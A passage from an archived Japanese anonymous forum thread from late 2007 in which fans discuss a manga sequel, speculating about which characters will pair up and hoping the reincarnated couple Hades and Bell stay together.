先が読めないなー、ほんとに。
毎月出しておくれよ・・・

106 :花と名無しさん:2007/11/28(水) 11:21:39 ID:???O
作者は、1とはあえて違った展開にしそうだな。
読んでてそういう意思を感じる


107 :花と名無しさん:2007/11/28(水) 15:40:55 ID:???0
どっかの漫画みたいなキャラそのまんまのストーリー焼き直し二次作品
みたいのは勘弁して欲しいわ。

108 :花と名無しさん:2007/11/28(水) 16:08:32 ID:???O
>>107
それは無さそうだから安心していいと思う。

109 :花と名無しさん:2007/11/28(水) 21:07:19 ID:???O
しかし、旧作ファンには違った意味で安心できないけどなw

110 :花と名無しさん:2007/11/30(金) 03:21:31 ID:???0
こんだけドキドキさせてくれる漫画って久し振りだおwktk

111 :花と名無しさん:2007/11/30(金) 09:25:56 ID:???0
たいてい続編ってツマンネーって思うものがほとんどなんだけど
今回は、予想斜め上(ほめてるつもり)いってくれるから
先が読めなくて、続きがホント楽しみだよ

今回の転生は、ハデベルにならない可能性が無きにしも非ずだけど
やっぱハデベルになってほしいな
この二人だけは何回転生しても心が変わらないキャラでいてほしい

112 :花と名無しさん:2007/11/30(金) 10:03:09 ID:???O
今のところアリサがナルミとショウ、どっちとくっつくか可能性としてどっちもありだね。

113 :花と名無しさん:2007/11/30(金) 21:57:59 ID:???O
ショウとサヨコの関係に、ショウが納得してることがショックで、その後のナルミとアリサのいいシーンが、まるっきり入ってこなかった。
うぅっ、もったいないことを・・・。

114 :花と名無しさん:2007/12/02(日) 01:02:00 ID:???O
自分もハデベルには何度転生しても、お互いが運命の相手であってほしいな
予定調和というか王道が好きなもので
そこをあえて外してくる可能性もあるだろうけど、
そうなると個人的にがっかりというか続編なくて良かったのに…と思ってしまいそうで怖い

115 :花と名無しさん:2007/12/02(日) 03:41:47 ID:???O
ハデベルは好きだし、くっついてもらいたいと思う反面、何度生まれ変わってもずっと同じ人と一緒っていうのもなー・・・という気持ちもある。
しかし、神代、前回転生時の二人の頑張りを見ていたのて゛、成立しないと一度やっちゃったらもう別の人かよーという気持ちもある。
いっそのことベルには、一人で次代ガイアとして生きるのはどうかすすめてしまいそうw

36 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)